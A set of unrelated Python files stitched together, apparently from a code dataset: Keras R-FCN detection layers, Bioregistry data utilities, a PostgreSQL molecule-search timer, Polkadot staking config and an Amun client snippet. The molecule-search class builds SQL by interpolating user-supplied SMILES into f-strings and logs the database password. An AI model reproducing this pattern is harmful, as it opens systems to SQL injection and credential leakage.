class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded.
deltas: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (dy, dx, log(dh), log(dw))]
        Class-specific bbox refinements.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
# Assertions
asserts = [
tf.Assert(tf.greater(tf.shape(proposals)[0], 0), [proposals],
name="roi_assertion"),
]
with tf.control_dependencies(asserts):
proposals = tf.identity(proposals)
# Remove zero padding
proposals, _ = trim_zeros_graph(proposals, name="trim_proposals")
gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes")
gt_class_ids = tf.boolean_mask(gt_class_ids, non_zeros,
name="trim_gt_class_ids")
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = tf.where(gt_class_ids < 0)[:, 0]
non_crowd_ix = tf.where(gt_class_ids > 0)[:, 0]
crowd_boxes = tf.gather(gt_boxes, crowd_ix)
gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix)
gt_boxes = tf.gather(gt_boxes, non_crowd_ix)
# Compute overlaps matrix [proposals, gt_boxes]
overlaps = overlaps_graph(proposals, gt_boxes)
# Compute overlaps with crowd boxes [anchors, crowds]
crowd_overlaps = overlaps_graph(proposals, crowd_boxes)
crowd_iou_max = tf.reduce_max(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
    # Determine positive and negative ROIs
roi_iou_max = tf.reduce_max(overlaps, axis=1)
# 1. Positive ROIs are those with >= 0.5 IoU with a GT box
positive_roi_bool = (roi_iou_max >= 0.5)
positive_indices = tf.where(positive_roi_bool)[:, 0]
# 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds.
negative_indices = tf.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0]
# Subsample ROIs. Aim for 33% positive
# Positive ROIs
positive_count = int(config.TRAIN_ROIS_PER_IMAGE *
config.ROI_POSITIVE_RATIO)
positive_indices = tf.random_shuffle(positive_indices)[:positive_count]
positive_count = tf.shape(positive_indices)[0]
# Negative ROIs. Add enough to maintain positive:negative ratio.
r = 1.0 / config.ROI_POSITIVE_RATIO
negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count
negative_indices = tf.random_shuffle(negative_indices)[:negative_count]
# Gather selected ROIs
positive_rois = tf.gather(proposals, positive_indices)
negative_rois = tf.gather(proposals, negative_indices)
# Assign positive ROIs to GT boxes.
positive_overlaps = tf.gather(overlaps, positive_indices)
roi_gt_box_assignment = tf.argmax(positive_overlaps, axis=1)
roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment)
roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment)
# Compute bbox refinement for positive ROIs
deltas = KerasRFCN.Utils.box_refinement_graph(positive_rois, roi_gt_boxes)
deltas /= config.BBOX_STD_DEV
# Append negative ROIs and pad bbox deltas and masks that
# are not used for negative ROIs with zeros.
rois = tf.concat([positive_rois, negative_rois], axis=0)
N = tf.shape(negative_rois)[0]
P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(rois)[0], 0)
rois = tf.pad(rois, [(0, P), (0, 0)])
roi_gt_boxes = tf.pad(roi_gt_boxes, [(0, N + P), (0, 0)])
roi_gt_class_ids = tf.pad(roi_gt_class_ids, [(0, N + P)])
deltas = tf.pad(deltas, [(0, N + P), (0, 0)])
return rois, roi_gt_class_ids, deltas
def trim_zeros_graph(boxes, name=None):
"""Often boxes are represented with matricies of shape [N, 4] and
are padded with zeros. This removes zero boxes.
boxes: [N, 4] matrix of boxes.
non_zeros: [N] a 1D boolean mask identifying the rows to keep
"""
non_zeros = tf.cast(tf.reduce_sum(tf.abs(boxes), axis=1), tf.bool)
boxes = tf.boolean_mask(boxes, non_zeros, name=name)
return boxes, non_zeros
class DetectionTargetLayer(KE.Layer):
"""Subsamples proposals and generates target box refinment, class_ids for each.
Inputs:
proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs.
gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized
coordinates.
Returns: Target ROIs and corresponding class IDs, bounding box shifts
rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized
coordinates
target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, NUM_CLASSES,
(dy, dx, log(dh), log(dw), class_id)]
        Class-specific bbox refinements.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
def __init__(self, config, **kwargs):
super(DetectionTargetLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
proposals = inputs[0]
gt_class_ids = inputs[1]
gt_boxes = inputs[2]
# Slice the batch and run a graph for each slice
# TODO: Rename target_bbox to target_deltas for clarity
names = ["rois", "target_class_ids", "target_bbox"]
outputs = KerasRFCN.Utils.batch_slice(
[proposals, gt_class_ids, gt_boxes],
lambda w, x, y: detection_targets_graph(
w, x, y, self.config),
self.config.IMAGES_PER_GPU, names=names)
return outputs
def compute_output_shape(self, input_shape):
return [
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois
(None, 1), # class_ids
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas
]
############################################################
# ROI pooling on Muti Bins
############################################################
def log2_graph(x):
"""Implementatin of Log2. TF doesn't have a native implemenation."""
return tf.log(x) / tf.log(2.0)
class VotePooling(KE.Layer):
def __init__(self, num_rois, channel_num, k, pool_shape, batch_size, image_shape, **kwargs):
super(VotePooling, self).__init__(**kwargs)
self.channel_num = channel_num
self.k = k
self.num_rois = num_rois
self.pool_shape = pool_shape
self.batch_size = batch_size
self.image_shape = image_shape
def call(self, inputs):
boxes = inputs[0]
# Feature Maps. List of feature maps from different level of the
# feature pyramid. Each is [batch, height, width, channels]
score_maps = inputs[1:]
# Assign each ROI to a level in the pyramid based on the ROI area.
y1, x1, y2, x2 = tf.split(boxes, 4, axis=2)
h = y2 - y1
w = x2 - x1
# Equation 1 in the Feature Pyramid Networks paper. Account for
# the fact that our coordinates are normalized here.
# e.g. a 224x224 ROI (in pixels) maps to P4
image_area = tf.cast(
self.image_shape[0] * self.image_shape[1], tf.float32)
roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area)))
roi_level = tf.minimum(5, tf.maximum(
2, 4 + tf.cast(tf.round(roi_level), tf.int32)))
roi_level = tf.squeeze(roi_level, 2)
# Loop through levels and apply ROI pooling to each. P2 to P5.
pooled = []
box_to_level = []
for i, level in enumerate(range(2, 6)):
ix = tf.where(tf.equal(roi_level, level))
level_boxes = tf.gather_nd(boxes, ix)
            # Box indices for crop_and_resize.
box_indices = tf.cast(ix[:, 0], tf.int32)
# Keep track of which box is mapped to which level
box_to_level.append(ix)
            # Stop gradient propagation to ROI proposals
level_boxes = tf.stop_gradient(level_boxes)
box_indices = tf.stop_gradient(box_indices)
# Here we use the simplified approach of a single value per bin,
# which is how it's done in tf.crop_and_resize()
# Result: [batch * num_boxes, pool_height, pool_width, channels]
pooled.append(tf.image.crop_and_resize(
score_maps[i], level_boxes, box_indices, [self.pool_shape * self.k, self.pool_shape * self.k],
method="bilinear"))
# Pack pooled features into one tensor
pooled = tf.concat(pooled, axis=0)
# position-sensitive ROI pooling + classify
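        # Shape walk-through (e.g. k=3, pool_shape=7, assuming those config
        # values): each crop above is [N, 21, 21, channel_num * 9]; bin i
        # takes its own 7x7 spatial cell and its own channel_num-channel
        # slice, average-pools it to [N, 1, channel_num], and the 9 bins are
        # concatenated and summed below -- the "vote" across position bins.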
score_map_bins = []
for channel_step in range(self.k*self.k):
bin_x = K.variable( int(channel_step % self.k) * self.pool_shape, dtype='int32')
bin_y = K.variable( int(channel_step / self.k) * self.pool_shape, dtype='int32')
channel_indices = K.variable(list(range(channel_step*self.channel_num, (channel_step+1)*self.channel_num)), dtype='int32')
croped = tf.image.crop_to_bounding_box(
tf.gather( pooled, indices=channel_indices, axis=-1), bin_y, bin_x, self.pool_shape, self.pool_shape)
# [pool_shape, pool_shape, channel_num] ==> [1,1,channel_num] ==> [1, channel_num]
croped_mean = K.pool2d(croped, (self.pool_shape, self.pool_shape), strides=(1, 1), padding='valid', data_format="channels_last", pool_mode='avg')
# [batch * num_rois, 1,1,channel_num] ==> [batch * num_rois, 1, channel_num]
croped_mean = K.squeeze(croped_mean, axis=1)
score_map_bins.append(croped_mean)
# [batch * num_rois, k^2, channel_num]
score_map_bins = tf.concat(score_map_bins, axis=1)
# [batch * num_rois, k*k, channel_num] ==> [batch * num_rois,channel_num]
# because "keepdims=False", the axis 1 will not keep. else will be [batch * num_rois,1,channel_num]
pooled = K.sum(score_map_bins, axis=1)
# Pack box_to_level mapping into one array and add another
# column representing the order of pooled boxes
box_to_level = tf.concat(box_to_level, axis=0)
box_range = tf.expand_dims(tf.range(tf.shape(box_to_level)[0]), 1)
box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range],
axis=1)
# Rearrange pooled features to match the order of the original boxes
# Sort box_to_level by batch then box index
# TF doesn't have a way to sort by two columns, so merge them and sort.
sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1]
ix = tf.nn.top_k(sorting_tensor, k=tf.shape(
box_to_level)[0]).indices[::-1]
ix = tf.gather(box_to_level[:, 2], ix)
pooled = tf.gather(pooled, ix)
# Re-add the batch dimension
pooled = tf.expand_dims(pooled, 0)
return pooled
def compute_output_shape(self, input_shape):
return None, self.num_rois, self.channel_num
############################################################
# Detection Layer
############################################################
def clip_to_window(window, boxes):
"""
window: (y1, x1, y2, x2). The window in the image we want to clip to.
boxes: [N, (y1, x1, y2, x2)]
"""
boxes[:, 0] = np.maximum(np.minimum(boxes[:, 0], window[2]), window[0])
boxes[:, 1] = np.maximum(np.minimum(boxes[:, 1], window[3]), window[1])
boxes[:, 2] = np.maximum(np.minimum(boxes[:, 2], window[2]), window[0])
boxes[:, 3] = np.maximum(np.minimum(boxes[:, 3], window[3]), window[1])
return boxes
def refine_detections_graph(rois, probs, deltas, window, config):
"""Refine classified proposals and filter overlaps and return final
detections.
Inputs:
rois: [N, (y1, x1, y2, x2)] in normalized coordinates
probs: [N, num_classes]. Class probabilities.
deltas: [N, (dy, dx, log(dh), log(dw))]. Class-specific
bounding box deltas.
window: (y1, x1, y2, x2) in image coordinates. The part of the image
that contains the image excluding the padding.
Returns detections shaped: [N, (y1, x1, y2, x2, class_id, score)] where
coordinates are in image domain.
"""
# Class IDs per ROI
class_ids = tf.argmax(probs, axis=1, output_type=tf.int32)
# Class probability of the top class of each ROI
indices = tf.stack([tf.range(probs.shape[0]), class_ids], axis=1)
class_scores = tf.gather_nd(probs, indices)
# Class-specific bounding box deltas
# deltas_specific = tf.gather_nd(deltas, indices)
# Apply bounding box deltas
# Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates
refined_rois = apply_box_deltas_graph(
rois, deltas * config.BBOX_STD_DEV)
    # Convert coordinates to image domain
# TODO: better to keep them normalized until later
height, width = config.IMAGE_SHAPE[:2]
refined_rois *= tf.constant([height, width, height, width], dtype=tf.float32)
# Clip boxes to image window
refined_rois = clip_boxes_graph(refined_rois, window)
    # Round and cast to int since we're dealing with pixels now
refined_rois = tf.to_int32(tf.rint(refined_rois))
# TODO: Filter out boxes with zero area
# Filter out background boxes
keep = tf.where(class_ids > 0)[:, 0]
# Filter out low confidence boxes
if config.DETECTION_MIN_CONFIDENCE:
conf_keep = tf.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0]
keep = tf.sets.set_intersection(tf.expand_dims(keep, 0),
tf.expand_dims(conf_keep, 0))
keep = tf.sparse_tensor_to_dense(keep)[0]
# Apply per-class NMS
# 1. Prepare variables
pre_nms_class_ids = tf.gather(class_ids, keep)
pre_nms_scores = tf.gather(class_scores, keep)
pre_nms_rois = tf.gather(refined_rois, keep)
unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0]
def nms_keep_map(class_id):
"""Apply Non-Maximum Suppression on ROIs of the given class."""
# Indices of ROIs of the given class
ixs = tf.where(tf.equal(pre_nms_class_ids, class_id))[:, 0]
# Apply NMS
class_keep = tf.image.non_max_suppression(
tf.to_float(tf.gather(pre_nms_rois, ixs)),
tf.gather(pre_nms_scores, ixs),
max_output_size=config.DETECTION_MAX_INSTANCES,
iou_threshold=config.DETECTION_NMS_THRESHOLD)
        # Map indices
class_keep = tf.gather(keep, tf.gather(ixs, class_keep))
# Pad with -1 so returned tensors have the same shape
gap = config.DETECTION_MAX_INSTANCES - tf.shape(class_keep)[0]
class_keep = tf.pad(class_keep, [(0, gap)],
mode='CONSTANT', constant_values=-1)
# Set shape so map_fn() can infer result shape
class_keep.set_shape([config.DETECTION_MAX_INSTANCES])
return class_keep
# 2. Map over class IDs
nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids,
dtype=tf.int64)
# 3. Merge results into one list, and remove -1 padding
nms_keep = tf.reshape(nms_keep, [-1])
nms_keep = tf.gather(nms_keep, tf.where(nms_keep > -1)[:, 0])
# 4. Compute intersection between keep and nms_keep
keep = tf.sets.set_intersection(tf.expand_dims(keep, 0),
tf.expand_dims(nms_keep, 0))
keep = tf.sparse_tensor_to_dense(keep)[0]
# Keep top detections
roi_count = config.DETECTION_MAX_INSTANCES
class_scores_keep = tf.gather(class_scores, keep)
num_keep = tf.minimum(tf.shape(class_scores_keep)[0], roi_count)
top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1]
keep = tf.gather(keep, top_ids)
# Arrange output as [N, (y1, x1, y2, x2, class_id, score)]
# Coordinates are in image domain.
detections = tf.concat([
tf.to_float(tf.gather(refined_rois, keep)),
tf.to_float(tf.gather(class_ids, keep))[..., tf.newaxis],
tf.gather(class_scores, keep)[..., tf.newaxis]
], axis=1)
# Pad with zeros if detections < DETECTION_MAX_INSTANCES
gap = config.DETECTION_MAX_INSTANCES - tf.shape(detections)[0]
detections = tf.pad(detections, [(0, gap), (0, 0)], "CONSTANT")
return detections
def parse_image_meta_graph(meta):
"""Parses a tensor that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
"""
image_id = meta[:, 0]
image_shape = meta[:, 1:4]
window = meta[:, 4:8]
active_class_ids = meta[:, 8:]
return [image_id, image_shape, window, active_class_ids]
class DetectionLayer(KE.Layer):
"""Takes classified proposal boxes and their bounding box deltas and
returns the final detection boxes.
Returns:
[batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where
coordinates are in image domain
"""
def __init__(self, config=None, **kwargs):
super(DetectionLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
rois = inputs[0]
mrcnn_class = inputs[1]
mrcnn_bbox = inputs[2]
image_meta = inputs[3]
# Run detection refinement graph on each item in the batch
_, _, window, _ = parse_image_meta_graph(image_meta)
detections_batch = KerasRFCN.Utils.batch_slice(
[rois, mrcnn_class, mrcnn_bbox, window],
lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config),
self.config.IMAGES_PER_GPU)
# Reshape output
        # [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in pixels
return tf.reshape(
detections_batch,
[self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6])
def compute_output_shape(self, input_shape):
return (None, self.config.DETECTION_MAX_INSTANCES, 6)
|
python
|
# -*- coding: utf-8 -*-
"""Utilities for interacting with data and the schema."""
import json
import logging
from collections import defaultdict
from functools import lru_cache
from pathlib import Path
from typing import Dict, Mapping, Set, Union
from .constants import (
BIOREGISTRY_PATH,
COLLECTIONS_PATH,
CONTEXTS_PATH,
METAREGISTRY_PATH,
MISMATCH_PATH,
)
from .schema import Attributable, Collection, Context, Registry, Resource
from .utils import extended_encoder
logger = logging.getLogger(__name__)
@lru_cache(maxsize=1)
def read_metaregistry() -> Mapping[str, Registry]:
"""Read the metaregistry."""
with open(METAREGISTRY_PATH, encoding="utf-8") as file:
data = json.load(file)
return {
registry.prefix: registry
for registry in (Registry(**record) for record in data["metaregistry"])
}
@lru_cache(maxsize=1)
def read_registry() -> Mapping[str, Resource]:
"""Read the Bioregistry as JSON."""
return _registry_from_path(BIOREGISTRY_PATH)
def _registry_from_path(path: Union[str, Path]) -> Mapping[str, Resource]:
with open(path, encoding="utf-8") as file:
data = json.load(file)
return {prefix: Resource(prefix=prefix, **value) for prefix, value in data.items()}
def add_resource(resource: Resource) -> None:
"""Add a resource to the registry.
:param resource: A resource object to write
:raises KeyError: if the prefix is already present in the registry
"""
registry = dict(read_registry())
if resource.prefix in registry:
raise KeyError("Tried to add duplicate entry to the registry")
registry[resource.prefix] = resource
# Clear the cache
read_registry.cache_clear()
write_registry(registry)
@lru_cache(maxsize=1)
def read_mismatches() -> Mapping[str, Mapping[str, str]]:
"""Read the mismatches as JSON."""
with MISMATCH_PATH.open() as file:
return json.load(file)
def is_mismatch(bioregistry_prefix, external_metaprefix, external_prefix) -> bool:
"""Return if the triple is a mismatch."""
return external_prefix in read_mismatches().get(bioregistry_prefix, {}).get(
external_metaprefix, {}
)
@lru_cache(maxsize=1)
def read_collections() -> Mapping[str, Collection]:
"""Read the manually curated collections."""
with open(COLLECTIONS_PATH, encoding="utf-8") as file:
data = json.load(file)
return {
collection.identifier: collection
for collection in (Collection(**record) for record in data["collections"])
}
def write_collections(collections: Mapping[str, Collection]) -> None:
"""Write the collections."""
values = [v for _, v in sorted(collections.items())]
for collection in values:
collection.resources = sorted(set(collection.resources))
with open(COLLECTIONS_PATH, encoding="utf-8", mode="w") as file:
json.dump(
{"collections": values},
file,
indent=2,
sort_keys=True,
ensure_ascii=False,
default=extended_encoder,
)
def write_registry(registry: Mapping[str, Resource]):
"""Write to the Bioregistry."""
with open(BIOREGISTRY_PATH, mode="w", encoding="utf-8") as file:
json.dump(
registry, file, indent=2, sort_keys=True, ensure_ascii=False, default=extended_encoder
)
def write_metaregistry(metaregistry: Mapping[str, Registry]) -> None:
"""Write to the metaregistry."""
values = [v for _, v in sorted(metaregistry.items())]
with open(METAREGISTRY_PATH, mode="w", encoding="utf-8") as file:
json.dump(
{"metaregistry": values},
fp=file,
indent=2,
sort_keys=True,
ensure_ascii=False,
default=extended_encoder,
)
def write_contexts(contexts: Mapping[str, Context]) -> None:
"""Write to contexts."""
with open(CONTEXTS_PATH, mode="w", encoding="utf-8") as file:
json.dump(
contexts,
fp=file,
indent=2,
sort_keys=True,
ensure_ascii=False,
default=extended_encoder,
)
def read_contributors() -> Mapping[str, Attributable]:
"""Get a mapping from contributor ORCID identifiers to author objects."""
rv: Dict[str, Attributable] = {}
for resource in read_registry().values():
if resource.contributor and resource.contributor.orcid:
rv[resource.contributor.orcid] = resource.contributor
for contributor in resource.contributor_extras or []:
if contributor.orcid:
rv[contributor.orcid] = contributor
if resource.reviewer and resource.reviewer.orcid:
rv[resource.reviewer.orcid] = resource.reviewer
contact = resource.get_contact()
if contact and contact.orcid:
rv[contact.orcid] = contact
for metaresource in read_metaregistry().values():
if metaresource.contact.orcid:
rv[metaresource.contact.orcid] = metaresource.contact
for collection in read_collections().values():
for author in collection.authors or []:
if author.orcid:
rv[author.orcid] = author
return rv
def read_prefix_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to prefixes."""
rv = defaultdict(set)
for prefix, resource in read_registry().items():
if resource.contributor and resource.contributor.orcid:
rv[resource.contributor.orcid].add(prefix)
for contributor in resource.contributor_extras or []:
if contributor.orcid:
rv[contributor.orcid].add(prefix)
return dict(rv)
def read_prefix_reviews() -> Mapping[str, Set[str]]:
"""Get a mapping from reviewer ORCID identifiers to prefixes."""
rv = defaultdict(set)
for prefix, resource in read_registry().items():
if resource.reviewer and resource.reviewer.orcid:
rv[resource.reviewer.orcid].add(prefix)
return dict(rv)
def read_prefix_contacts() -> Mapping[str, Set[str]]:
"""Get a mapping from contact ORCID identifiers to prefixes."""
rv = defaultdict(set)
for prefix, resource in read_registry().items():
contact_orcid = resource.get_contact_orcid()
if contact_orcid:
rv[contact_orcid].add(prefix)
return dict(rv)
def read_collections_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to collections."""
rv = defaultdict(set)
for collection_id, resource in read_collections().items():
for author in resource.authors or []:
rv[author.orcid].add(collection_id)
return dict(rv)
def read_registry_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to collections."""
rv = defaultdict(set)
for metaprefix, resource in read_metaregistry().items():
if resource.contact and resource.contact.orcid:
rv[resource.contact.orcid].add(metaprefix)
return dict(rv)
def read_context_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to contexts."""
rv = defaultdict(set)
for context_key, context in read_contexts().items():
for maintainer in context.maintainers:
rv[maintainer.orcid].add(context_key)
return dict(rv)
def read_contexts() -> Mapping[str, Context]:
"""Get a mapping from context keys to contexts."""
return {
key: Context(**data)
for key, data in json.loads(CONTEXTS_PATH.read_text(encoding="utf-8")).items()
}
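# Minimal usage sketch (hedged: assumes the packaged JSON data files exist at
# the paths configured in .constants).
if __name__ == "__main__":
    registry = read_registry()  # cached prefix -> Resource mapping
    contributors = read_contributors()  # ORCID -> Attributable
    print(f"{len(registry)} prefixes, {len(contributors)} unique contributors")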
|
python
|
from dataclasses import dataclass
from time import time
from typing import Union, Tuple
import psycopg2
from loguru import logger
from pony.orm import Database, Required, PrimaryKey, db_session
@dataclass()
class GetQuery:
mol_smi: str
search_type: str
fp_type: Union[bool, str] = False
sort_by_similarity: bool = False
@property
def get_fp_function_name(self) -> str:
fp_dict = {"mfp2": "morganbv_fp", "ffp2": "featmorganbv_fp", "torsionbv": "torsionbv_fp"}
        try:
            return fp_dict[self.fp_type]
        except KeyError:
            # Returning an error string here would silently produce broken SQL,
            # so fail loudly instead.
            raise ValueError(f"Unknown fingerprint type: {self.fp_type!r}")
def __str__(self) -> str:
"""
Generates a query to the database.
"""
if self.search_type == "similarity":
function_name = self.get_fp_function_name
if not self.sort_by_similarity:
logger.info(
f"select * from public.fps where {self.fp_type}%{function_name}('{self.mol_smi}')"
)
return f"select * from public.fps where {self.fp_type}%{function_name}('{self.mol_smi}')"
else:
if self.fp_type == "mfp2":
return (
f"select id, tanimoto_sml({self.fp_type}, {function_name}('{self.mol_smi}')) t "
f"from public.fps where {self.fp_type}%{function_name}('{self.mol_smi}') order by t DESC"
)
if self.search_type == "substructure":
if not self.sort_by_similarity:
return f"select * from public.mols where m@>'{self.mol_smi}'"
else:
function_name = self.get_fp_function_name
count_tanimoto = (
f"tanimoto_sml({function_name}(m), {function_name}('{self.mol_smi}'))"
)
return (
f"select id, m, {count_tanimoto} t from public.mols where m@>'{self.mol_smi}' "
f"order by t DESC"
)
        if self.search_type == "equal":
            # Exact-match search is not implemented yet; __str__ must return a
            # string, so fail loudly rather than silently returning None.
            raise NotImplementedError("exact-match search is not implemented")
def pony_db_map(db_name: str, user_name: str, db_port: int, db_password: str) -> Database:
"""
Creates classes for PonyORM.
"""
db = Database()
class Fps(db.Entity):
_table_ = "fps"
id = PrimaryKey(int, auto=True)
mfp2 = Required(int)
class Mols(db.Entity):
_table_ = "mols"
id = PrimaryKey(int, auto=True)
m = Required(str)
class Raw_data(db.Entity):
_table_ = "raw_data"
id = PrimaryKey(int, auto=True)
smiles = Required(str)
if db_password:
db.bind(
provider="postgres",
user=user_name,
host="localhost",
database=db_name,
port=db_port,
password=db_password,
)
else:
db.bind(
provider="postgres",
user=user_name,
host="localhost",
database=db_name,
port=db_port,
)
db.generate_mapping(create_tables=True)
return db
class SearchTimeCursor:
def __init__(self, **kwargs):
"""
Database connection.
"""
conn_params = (
f"port={kwargs['port']} "
f"dbname={kwargs['dbname']} "
f"host=localhost "
f"user={kwargs['user']}"
)
if kwargs["password"]:
conn_params = f"{conn_params} password={kwargs['password']}"
logger.info(conn_params, "connection params")
conn = psycopg2.connect(conn_params)
# loguru doesn't work in this case (AttributeError: 'psycopg2.extensions.connection' object has no attribute
# 'format')
print(conn, "connection")
self.curs = conn.cursor()
def get_time_and_count(
self,
mol_smi: str,
search_type: str,
fp_type: Union[bool, str] = False,
sort_by_similarity: bool = False,
limit: int = 1,
) -> Tuple[float, int]:
"""
Counts time for search by PostgreSQL.
Returns search time and count mols from query.
"""
logger.info("Postgresql search... ")
query = str(
GetQuery(
mol_smi=mol_smi,
search_type=search_type,
fp_type=fp_type,
sort_by_similarity=sort_by_similarity,
)
)
start_time = time()
self.curs.execute(query)
query_res = self.curs.fetchmany(size=limit)
end_time = time()
return end_time - start_time, len(query_res)
class SearchPony:
def __init__(self, database_name: str, user_name: str, db_port: int, db_password: str):
"""
Database connection.
"""
self.database_name = database_name
self.user_name = user_name
self.db = pony_db_map(self.database_name, self.user_name, db_port, db_password)
@db_session
def get_time_and_count(
self,
mol_smi: str,
search_type: str,
fp_type: Union[bool, str] = False,
sort_by_similarity: bool = False,
        limit: int = 1,
) -> Tuple[float, int]:
"""
Counts time for search by PonyORM.
Returns search time and count mols from query.
"""
logger.info("Pony search..")
postgresql_query = GetQuery(
mol_smi=mol_smi,
search_type=search_type,
fp_type=fp_type,
sort_by_similarity=sort_by_similarity,
)
logger.info(
"Query for {} search, fp type {}, sort by similatity {} postgresql: {}",
search_type,
fp_type,
sort_by_similarity,
postgresql_query,
)
start_time = time()
res = self.db.execute(str(postgresql_query))
query_res = res.fetchmany(size=limit)
end_time = time()
return end_time - start_time, len(query_res)
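# Quick illustration (hedged: no database connection is needed just to render
# the SQL text; the SMILES value below is an arbitrary example).
if __name__ == "__main__":
    demo = GetQuery(mol_smi="CCO", search_type="substructure")
    print(demo)  # select * from public.mols where m@>'CCO'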
|
python
|
from substrateinterface import SubstrateInterface
import os
from utils import get_project_root_dir
# execution environment (for testing) --------------
main_script = os.path.join(get_project_root_dir(), "StakingManager.py")
# to get your python env, execute "which python" in CLI with env activated
# E.g. for anaconda read https://docs.anaconda.com/anaconda/user-guide/tasks/integration/python-path/
"""
Lucas:
I put my env below, just comment it out and run yours. We'll put
everything in a docker container later to resolve this issue
"""
venv_env = "/Users/lucas/opt/anaconda3/envs/crypto_hedge_fund/bin/python"
# venv_env = os.path.join(get_project_root_dir(), "venv\\Scripts\\python.exe")
# websockets ---------------------------------------
# Substrate is a modular framework for building blockchains.
# Polkadot is built using Substrate. Chains built with Substrate will be easy to connect as parachains.
# dot
# https://github.com/paritytech/ss58-registry/blob/main/ss58-registry.json
def substratePolkadot():
substrate_polkadot = SubstrateInterface(
url="wss://rpc.polkadot.io",
ss58_format=0,
type_registry_preset='polkadot'
)
return substrate_polkadot
# Kusama
def substrateKusama():
substrate_kusama = SubstrateInterface(
url="wss://kusama-rpc.polkadot.io/",
ss58_format=2,
type_registry_preset='kusama'
)
return substrate_kusama
# Rococo
def substrateRococo():
substrate_rococo = SubstrateInterface(
url="wss://rococo-rpc.polkadot.io",
ss58_format=42,
type_registry_preset='rococo'
)
return substrate_rococo
# Westend
def substrateWestend():
substrate_westend = SubstrateInterface(
url="wss://westend-rpc.polkadot.io",
ss58_format=42,
type_registry_preset='westend'
)
return substrate_westend
# ---------------------------------------
# validator
westendValidator = ["5C556QTtg1bJ43GDSgeowa3Ark6aeSHGTac1b2rKSXtgmSmW"]
binanceValidator = ["114SUbKCXjmb9czpWTtS3JANSmNRwVa4mmsMrWYpRG1kDH5"]
# There is also a maximum of 22,500 nominators in place at the moment. That means,
# if there are already 22,500 nominators, you will not be able to nominate,
# even if you have more than the minimum of 120 DOT staked.
# You can double-check the current number of nominators
# on https://polkadot.js.org/apps/?rpc=wss%3A%2F%2Frpc.pinknode.io%2Fpolkadot%2Fexplorer#/staking
# TODO: a function that checks the number of active nominators; if the value is
# greater than 22,500 return False (no room to nominate), otherwise True.
# A possible sketch follows below.
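# Possible implementation sketch (hedged assumption: the Staking pallet exposes
# `CounterForNominators` and `MaxNominatorsCount` storage items, readable via
# py-substrate-interface's `query`; this function name is ours, not from the codebase).
def hasNominationCapacity(substrate):
    """Return True if the network can still accept new nominators."""
    current = substrate.query(module="Staking", storage_function="CounterForNominators")
    maximum = substrate.query(module="Staking", storage_function="MaxNominatorsCount")
    if maximum.value is None:  # no cap configured on this chain
        return True
    return current.value < maximum.value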
# configs
# TODO: `value` must be more than the `minimum_balance` specified by `T::Currency`;
# one way to fetch this via substrate-interface is sketched below.
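# Hedged sketch: the existential deposit is exposed as a runtime constant on the
# Balances pallet (function name below is ours, not from the codebase).
def getExistentialDeposit(substrate):
    """Fetch the chain's existential deposit in planck units."""
    return substrate.get_constant("Balances", "ExistentialDeposit").value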
class ProductionConfig:
activeSubstrate = substratePolkadot()
activeValidator = binanceValidator
ss58_format = 0
coinDecimalPlaces = 10 ** 10
coinDecimalPlacesLength = 10
coinName = "DOT"
# Nominating currently requires a minimum of 120 DOT staked funds on Polkadot
stakeMinimumAmount = 120
# On the Polkadot network, an address is only active when it holds a minimum amount, currently set at 1 DOT
existentialDeposit = 1
class TestingConfig:
activeSubstrate = substrateWestend()
activeValidator = westendValidator
ss58_format = 42
coinDecimalPlaces = 10 ** 12
coinDecimalPlacesLength = 12
coinName = "WND"
stakeMinimumAmount = 1
existentialDeposit = 1
activeConfig = TestingConfig
|
python
|
from aurora.amun.client.session import AmunSession
def main():
# Calling with no token in constructor will load one from an environment variable if provided
# or a file in HOME/.
session = AmunSession()
print("Getting Valuations")
valuations = session.get_valuations()
numToShow = 5
print(f"found {len(valuations)} valuations print first {numToShow}")
for val in valuations[:numToShow]:
print(val)
    # Filter valuations by name, description and author
